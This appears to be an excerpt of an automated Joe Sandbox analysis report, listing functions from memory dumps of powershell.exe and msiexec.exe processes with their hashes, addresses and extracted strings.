Opcode Fuzzy Hash: 40116dc84d90d472470a69bb1221d035a01cd1f7aefd43768b115f86e84f665c
Instruction Fuzzy Hash: 81716BB1E00219DFDF14CFA9C9847DEBBF2BF88314F148429E415AB254EB74A841EB81

Function 0781A4E4 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d09ec4d1c8687ce8fe5d51c73b64a3a5f85ce7d14a8e074c22596932ef4081
Instruction ID: 1200f9c23975481d8b9014aec9583a6b4a6170faf36d299fc351489958befd09
Opcode Fuzzy Hash: d6d09ec4d1c8687ce8fe5d51c73b64a3a5f85ce7d14a8e074c22596932ef4081
Instruction Fuzzy Hash: 8E4147F1B023028FDB28DE68D950BBAB7BAAF91314F14C06AD805DF255E735D941C7A2

Function 07810A80 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eba2a7cc936f1410806ecef8e640823eb349914d3e24243caff0e6bb036d3352
Instruction ID: 5d3e14137c36e39722b201998ec24319eac1d91ce7b89ff0ee9214520ca2f277
Opcode Fuzzy Hash: eba2a7cc936f1410806ecef8e640823eb349914d3e24243caff0e6bb036d3352
Instruction Fuzzy Hash: AC412BF2B00219DFDB24DEA99D403AEF7A9EFD5215B24852AC815EB340DA31D981C7E1

Function 04A296F9 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1663060551.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2637beabd2aa0cdd92cbfe52e220e1f1155a676d99ad8723b019c455546a3c53
Instruction ID: 6b61ec9662e94585cf0319aff0c24d3c6abb8fb0aca56ab93e5fa14e6d91d6c9
Opcode Fuzzy Hash: 2637beabd2aa0cdd92cbfe52e220e1f1155a676d99ad8723b019c455546a3c53
Instruction Fuzzy Hash: 79419170B002248FDB14DF68C954AAE7BF6FF89764F195868D406EB7A0DB34AC41DB90

Function 04A29953 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1663060551.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10bbce23b7ded73fdadb541af0cfed6b8e70ef361ca43f43a9918e99302bdb1
Instruction ID: 76e7e5a3e2777daac3b9d0b533e854e42f074a0ebddf34ba7750aaa2766ef64f
Opcode Fuzzy Hash: e10bbce23b7ded73fdadb541af0cfed6b8e70ef361ca43f43a9918e99302bdb1
Instruction Fuzzy Hash: DF41AE70A003189FDB24DFA8C84479EBBF6FF85304F148929C006AB790DB75AC46DB81

Function 07810EF8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97df7011f0073b91458f1328712fa206e1022966431bcfdc64622ae409d445c7
Instruction ID: 73a765b1f98e9cb8b3116190acf1bb4a4d82e17c107e209f6940e30f6652c347
Opcode Fuzzy Hash: 97df7011f0073b91458f1328712fa206e1022966431bcfdc64622ae409d445c7
Instruction Fuzzy Hash: 80214CB130031A9BE72459B98C91B37B39A9FD5716F14842AE546DB2C0DD75D8C1D360

Function 07811028 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db78d93ffff7b29d7369ce84b69ab996cc19533a1e0062fb93cf6dd4a539ea1a
Instruction ID: 42fa53b3610c804948afa22580af4e2e8b6b2cdc2b5f83a5b512d04eb2b3c8d0
Opcode Fuzzy Hash: db78d93ffff7b29d7369ce84b69ab996cc19533a1e0062fb93cf6dd4a539ea1a
Instruction Fuzzy Hash: 4D216BB2F1034E9BEB24997A9844B37B39EAFD4655F34842AD605CB381DD76C8418361

Function 04A2C508 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1663060551.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1002ae66a48df98046fe54494f1ebcd0e5c29565b2707d298dd3c65e6b69b99b
Instruction ID: 7d3156e044a555118ac9561ca2fe416ee953f7c7e5fc3fab44e8b64875b68bce
Opcode Fuzzy Hash: 1002ae66a48df98046fe54494f1ebcd0e5c29565b2707d298dd3c65e6b69b99b
Instruction Fuzzy Hash: 59313D30B011288FCB25DB68C9946EEB7B2BF89354F1044E9C509AB351DB35EE85DF91

Function 07810ED8 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24c021a13910358d335563342a410e33b77c011e96730b5af48ab36cef69cfbd
Instruction ID: 12a2c2669f4513cacb0dde211648ae982470c50ab0a8ba70de39cb18f69fc0cb
Opcode Fuzzy Hash: 24c021a13910358d335563342a410e33b77c011e96730b5af48ab36cef69cfbd
Instruction Fuzzy Hash: 6821B1F1304346ABE7204F758C417327BAA5F96301F248016E945DB2D2D979C8C4D371

Function 04A2398D Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1663060551.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aa232ece337ecb99dbcda02d62aaa1b6a65eb1a3fdf634a40abc989cd9ce97f
Instruction ID: 982f3c015b970c6f54ada801b0543a9781938289ad2a67e267fc665a35d2da5e
Opcode Fuzzy Hash: 1aa232ece337ecb99dbcda02d62aaa1b6a65eb1a3fdf634a40abc989cd9ce97f
Instruction Fuzzy Hash: 0E316774A0425A9FCB01CF5DC990AAABBF1FF4A310B1581A9D848EB751C735FC41CBA0

Function 07810A60 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbf426b42317038982ec3f21a9b0ae4557249c3fa26cc9b4dd97d0645bbeefd
Instruction ID: eee47dbf5f74086ecde5e3419603346015c7de4afb3dafa3b2ab6cac6914ac28
Opcode Fuzzy Hash: bfbf426b42317038982ec3f21a9b0ae4557249c3fa26cc9b4dd97d0645bbeefd
Instruction Fuzzy Hash: 7B21F9F6904255DFCB109F7A8D403B9BBB8BF95215B2981A7CC08EB241E3319981C7F1

Function 07811023 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 681aa0bcc4b785b027242f058b31d4ca34fc082e29ad35b1a204a235a5c25236
Instruction ID: ac4860cbba052805cff45d4ad57d6322e8ea9e740131ba24fcc89e1622151df6
Opcode Fuzzy Hash: 681aa0bcc4b785b027242f058b31d4ca34fc082e29ad35b1a204a235a5c25236
Instruction Fuzzy Hash: 5A117AF2F0038EA7EB305D7A8844B7377AE5F90655F34842AEF44D7281EA79C4808360

Function 07810C08 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92c7d079ac27fb129249a9eaace2ceba0a4ff077639fe6b8ba73be328765dc1
Instruction ID: 42e2c463fe669cdb1881bd6f3c945e6eb84b8ce36e777a3d23669c44a08ae9e4
Opcode Fuzzy Hash: c92c7d079ac27fb129249a9eaace2ceba0a4ff077639fe6b8ba73be328765dc1
Instruction Fuzzy Hash: 62017B7631031A8BD76089AAE80027BB3DDDBE5632F14C03FD449CB200DA32C885CB60

Function 04A2F62B Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1663060551.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af827bc921e2a8cfb5f5c1115d7276885022a362fe67630db7ee266f76309470
Instruction ID: 915af2c58a31db7428328377b017397d35b9e37d6d45066db27454b7ced4cd0a
Opcode Fuzzy Hash: af827bc921e2a8cfb5f5c1115d7276885022a362fe67630db7ee266f76309470
Instruction Fuzzy Hash: 4911B970D002A9DFEF24DB98DB887ECB771EB4931DF141429D001B6160EB756A89FB11

Function 04A22F6B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1663060551.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58d81da62fdcfd93a91bfa3e13d983105bfe4f9306108675611e57ed02a5849d
Instruction ID: eea6e37b4eb43e8e49c862bae8b83dd7208a9b898f1b52596281d33825e4e66c
Opcode Fuzzy Hash: 58d81da62fdcfd93a91bfa3e13d983105bfe4f9306108675611e57ed02a5849d
Instruction Fuzzy Hash: 21012C78A002159FDB04DB98D490AEDF771FF8E204B2486A9D85AA7361CA36EC039B50

Function 0487D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1662373015.000000000487D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0487D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_487d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a06bfe8e0c492e76e996485e3ffb059213fd4dbfddc401d21d7a608926b41e0
Instruction ID: fc2855ad5fef69c3a0f150090abec7fd877cbb3c18565660ce27c0733c5f0905
Opcode Fuzzy Hash: 5a06bfe8e0c492e76e996485e3ffb059213fd4dbfddc401d21d7a608926b41e0
Instruction Fuzzy Hash: AE01F7725043049FE7109E21D9C0B66BBD8DF41224F08CA1AEC098B182D679E441C6B2

Function 0487D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1662373015.000000000487D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0487D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_487d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8797793fb9f4c2fb23e66e76fcdfa8b9889611018e3a55bd91e726fb2e45774b
Instruction ID: d32718bb3ed95f63f3193674b972ce11c1cf6a4b2d582fdf2c23a57a2417f45a
Opcode Fuzzy Hash: 8797793fb9f4c2fb23e66e76fcdfa8b9889611018e3a55bd91e726fb2e45774b
Instruction Fuzzy Hash: 00014C7200E3C05FE7129B259994B52BFB4DF53224F1DC5CBD8888F1A3C2699849C772

Function 07818E34 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a0df8dd21523ca0dd7da9b3b361870a5b5afbd0bc220ebdf55a2ae799e315c
Instruction ID: 79855b72fdd8aff065d37b37093712410f20c7287b3746905f75e66d39bbca9b
Opcode Fuzzy Hash: 72a0df8dd21523ca0dd7da9b3b361870a5b5afbd0bc220ebdf55a2ae799e315c
Instruction Fuzzy Hash: 45F0E9F170420ACFCB2459A4A81233A624AAB95564F18C436C903DB254DF3AC841C362

Function 04A2354E Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1663060551.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e218dcdddf68a7d7d19f018d033143ec1d7174899dd2bac0d3dc6e41c82904
Instruction ID: efc5d37e4347dcd3ab0595e497b9e02f3d92f3f3c9caa18162e4f1c347f5a6df
Opcode Fuzzy Hash: 20e218dcdddf68a7d7d19f018d033143ec1d7174899dd2bac0d3dc6e41c82904
Instruction Fuzzy Hash: 8AF0DA35A001159FDB15CF9CD990AEEF7B1FF88324F208159E515A72A1C736ED52CB50

Function 078133A4 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04100571e249888c417ecca08c98f01922f6685f686e8ffb08d919b21ff9a212
Instruction ID: 77d9afb45ec3608aa333133ca0102b8d48c524b84c9992b50177edad2ce7d8da
Opcode Fuzzy Hash: 04100571e249888c417ecca08c98f01922f6685f686e8ffb08d919b21ff9a212
Instruction Fuzzy Hash: D2F03974608281DFC312CB24D498A10BF71AF53204F5DC1DAC048CF9A3CB76E842CB65

Non-executed Functions

Function 07817F80 Relevance: 10.3, Strings: 8, Instructions: 305COMMON

Download Yara Rule

Strings

(fyl, xrefs: 078180FE
(fyl, xrefs: 07818272
(fyl, xrefs: 078180F4
(fyl, xrefs: 078181CF
(fyl, xrefs: 07818079
(fyl, xrefs: 0781827C
(fyl, xrefs: 07818083
(fyl, xrefs: 078181C5

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: (fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl
API String ID: 0-251854188
Opcode ID: 157216c17418a75c645aed86d696e4d0c897a6b901bfc2582c3b944a7ad1a9cb
Instruction ID: 1d33bc3ea1938fd0620e9f8fe07311b8de03bd1792ca9f92f736e97f6cf64a0e
Opcode Fuzzy Hash: 157216c17418a75c645aed86d696e4d0c897a6b901bfc2582c3b944a7ad1a9cb
Instruction Fuzzy Hash: 22C1AFB0B00609CBDB24CF58C982B6AB7F6AF99724F14C529D806EB744DB71EC418B91

Function 0781E960 Relevance: 8.9, Strings: 7, Instructions: 191COMMON

Download Yara Rule

Strings

(fyl, xrefs: 0781EA86
(fyl, xrefs: 0781E9F5
(fyl, xrefs: 0781E9EB
4vl, xrefs: 0781EA17
(fyl, xrefs: 0781EA90
tLkk, xrefs: 0781EB1B
4vl, xrefs: 0781EA21

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: (fyl$(fyl$(fyl$(fyl$4vl$4vl$tLkk
API String ID: 0-2050809188
Opcode ID: 11263321194cab0bddfd2839ccb6245295d8f869f6f93f12ed66b26fde59aa48
Instruction ID: 665924f03b66660e59493b039bbd16c281b027aa05e13cfa6502137b7d890ed8
Opcode Fuzzy Hash: 11263321194cab0bddfd2839ccb6245295d8f869f6f93f12ed66b26fde59aa48
Instruction Fuzzy Hash: EB61CEB0B002099FD714CF69C480B6ABBFBBF99215F14C569D806EB751DB72EC418B92

Function 0781E3C8 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

x.jk, xrefs: 0781E7BC
(fyl, xrefs: 0781E45B
(fyl, xrefs: 0781E6CF
-jk, xrefs: 0781E801

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: (fyl$(fyl$x.jk$-jk
API String ID: 0-311673467
Opcode ID: 274cf120a7d2bad0c1e5887d830dab1f8bc2306ab9a40e2be1070a74404dde31
Instruction ID: 32b90b6d43272f39c6cb527e490ea5e57e69bc9e67cc870923465a04ee1f8d2d
Opcode Fuzzy Hash: 274cf120a7d2bad0c1e5887d830dab1f8bc2306ab9a40e2be1070a74404dde31
Instruction Fuzzy Hash: 3FC190F0A00205DFDB24DF58C551BAEB7B6AF98305F148929D806ABB44DB72EC81CB91

Function 07817F76 Relevance: 5.3, Strings: 4, Instructions: 253COMMON

Download Yara Rule

Strings

(fyl, xrefs: 07818272
(fyl, xrefs: 078180F4
(fyl, xrefs: 07818079
(fyl, xrefs: 078181C5

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: (fyl$(fyl$(fyl$(fyl
API String ID: 0-4278018943
Opcode ID: 872ebc096386838e72f4ef6734f5d76222fa910800a8999c680f8bfae77640b4
Instruction ID: 99037e2697b94847a6b28f6179481a0a7602da4dc843531e243d9c407b5084b2
Opcode Fuzzy Hash: 872ebc096386838e72f4ef6734f5d76222fa910800a8999c680f8bfae77640b4
Instruction Fuzzy Hash: F6A1A0B0A00606DBDB24CF54C582AAEB7B6FF99724F18C56DD816AB700C732A881CB51

Function 078176E0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(fyl, xrefs: 078177D7
(fyl, xrefs: 078177E1
(fyl, xrefs: 07817855
(fyl, xrefs: 0781785F

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: (fyl$(fyl$(fyl$(fyl
API String ID: 0-4278018943
Opcode ID: 668c2613f89d7fccab037c8d65a708aa4f7e2145555008c6792a0f430d79def5
Instruction ID: 4a9fb6a0330bba899143d5eb1a45fe514fa92bd744db5c10771f52e401856ced
Opcode Fuzzy Hash: 668c2613f89d7fccab037c8d65a708aa4f7e2145555008c6792a0f430d79def5
Instruction Fuzzy Hash: C071ACB0A00209DFDB14DF68D580BAEB7B6AF89214F24816DD805AB701DB75EC81CB91

Function 0781E953 Relevance: 5.2, Strings: 4, Instructions: 160COMMON

Download Yara Rule

Strings

(fyl, xrefs: 0781EA86
(fyl, xrefs: 0781E9EB
4vl, xrefs: 0781EA17
tLkk, xrefs: 0781EB1B

Memory Dump Source

Source File: 00000007.00000002.1694574118.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: (fyl$(fyl$4vl$tLkk
API String ID: 0-380497426
Opcode ID: 3886db1192054604b79911e023d69ac95ee377195ee0c6491460920c17efe62e
Instruction ID: 2259401781c086f042106abfc94f3a18637e0ff99920d2b9666c99fc4220ec95
Opcode Fuzzy Hash: 3886db1192054604b79911e023d69ac95ee377195ee0c6491460920c17efe62e
Instruction Fuzzy Hash: CE5190B0A00205DFD724CF59C580AAABBFABFA8715F14C569D806EB751D732E841CB91

Analysis Process: msiexec.exePID: 7460, Parent PID: 8040COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 243E35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 243E35CA

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: afb370a5607e167eed69c5a2d3e6bb5dbd093ac877319857aa089e45d1f622fe
Instruction ID: b973946b884d691ac59f1f1d2da66bb0b236ef4be46b97287f6478b726ca6455
Opcode Fuzzy Hash: afb370a5607e167eed69c5a2d3e6bb5dbd093ac877319857aa089e45d1f622fe
Instruction Fuzzy Hash: 9790023560950402D908715C495470610059BD1215F76D411A0425528D8795CE6165A2

Function 243E2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 243E2C7A

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfd4fec0d919f2d427a0b16dbda587e80b23ccdeef8aca41aeba4095e77b2a62
Instruction ID: a7fe7ce22742c3c5948d51828210b235c210d09beccdb23fbbb11f746c091bba
Opcode Fuzzy Hash: dfd4fec0d919f2d427a0b16dbda587e80b23ccdeef8aca41aeba4095e77b2a62
Instruction Fuzzy Hash: 2890023520548802D918715C884474A00059BD1315F6AD411A4425618D8795CDA17121

Function 243E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 243E2DFA

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 56f04798b60e6370a4e65981edb5620dd8ba98e0be3e486c5a2b2f7db9c37a2c
Instruction ID: ce1419797889670527d257b88891b35a1d0ba10fa18b10e83b81518dbb297432
Opcode Fuzzy Hash: 56f04798b60e6370a4e65981edb5620dd8ba98e0be3e486c5a2b2f7db9c37a2c
Instruction Fuzzy Hash: DC90023520540413D919715C494470700099BD1255FA6D412A0425518D9756CE62A121

Function 243E2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 243E2C24

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e143b4a92c0f81ff1e7de92c1d6d376095d473e7a2a0ed590fd4a791e6aa2434
Instruction ID: 441751425a3bd6705fd67b9558586942012d7135bf1819317a407586fe9af13d
Opcode Fuzzy Hash: e143b4a92c0f81ff1e7de92c1d6d376095d473e7a2a0ed590fd4a791e6aa2434
Instruction Fuzzy Hash: D5B09B759065D5C5DF05E7644A0871779107FD1715F26C061D2070641F4738C5D1E175

Non-executed Functions

Function 24422349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

UnloadEventTraceDepth, xrefs: 244224C0
@, xrefs: 24422942
TracingFlags, xrefs: 24422549
FrontEndHeapDebugOptions, xrefs: 24422489
ExecuteOptions, xrefs: 244225A0
UseImpersonatedDeviceMap, xrefs: 2442251C
MaxLoaderThreads, xrefs: 244224EC
GlobalFlag, xrefs: 24422F3F, 24423059
RaiseExceptionOnPossibleDeadlock, xrefs: 24422579
@, xrefs: 24422B74
DisableExceptionChainValidation, xrefs: 2442275F
GlobalFlag2, xrefs: 24422FC0
MinimumStackCommitInBytes, xrefs: 24422BB0
DisableHeapLookaside, xrefs: 2442246D
minkernel\ntdll\ldrinit.c, xrefs: 24423187
LdrpInitializeExecutionOptions, xrefs: 2442317D
CFGOptions, xrefs: 24422967
MaxDeadActivationContexts, xrefs: 24422D82
Initializing the application verifier package failed with status 0x%08lx, xrefs: 24423176
ShutdownFlags, xrefs: 244224A1

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 0f6d876eb959f6dcd2daa562ffe6e0c9450755e62993945858d18e5460c84b5f
Instruction ID: 996cf54cf3e6b08e2f4d03dfbc4b6df998d4fc95d710a15423500e2ed29b18e4
Opcode Fuzzy Hash: 0f6d876eb959f6dcd2daa562ffe6e0c9450755e62993945858d18e5460c84b5f
Instruction Fuzzy Hash: 95924B71608B41AFEB21CF25C880B6BBBE8BF84754F00492DFA949B351D774E945CB92

Function 243D8620 Relevance: 17.7, Strings: 14, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

corrupted critical section, xrefs: 244154C2
Address of the debug info found in the active list., xrefs: 244154AE, 244154FA
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2441540A, 24415496, 24415519
Invalid debug info address of this critical section, xrefs: 244154B6
Thread is in a state in which it cannot own a critical section, xrefs: 24415543
Critical section debug info address, xrefs: 2441541F, 2441552E
Thread identifier, xrefs: 2441553A
double initialized or corrupted critical section, xrefs: 24415508
